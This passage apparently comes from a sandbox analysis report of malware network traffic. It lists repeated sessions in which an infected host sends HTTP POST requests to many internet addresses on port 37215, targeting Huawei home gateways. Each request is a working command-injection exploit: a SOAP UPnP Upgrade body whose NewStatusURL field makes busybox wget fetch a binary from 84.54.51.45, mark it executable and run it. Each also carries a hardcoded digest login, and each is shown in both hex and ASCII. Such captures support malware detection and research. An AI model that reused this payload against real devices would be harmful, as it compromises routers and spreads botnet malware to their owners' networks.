78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1317192.168.2.1557242197.207.252.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730735064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1318192.168.2.1545446197.33.164.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730763912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1319192.168.2.1546690197.78.100.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730803967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1320192.168.2.1557870197.120.27.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730803967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1321192.168.2.1533588197.148.53.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730832100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1322192.168.2.1542790197.48.36.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730832100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1323192.168.2.1560066197.137.148.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730834961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1324192.168.2.1556796197.43.97.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730870008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1325192.168.2.1546602197.7.166.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730875015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1326192.168.2.1557398197.169.56.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730884075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1327192.168.2.1544982197.111.225.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730921984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
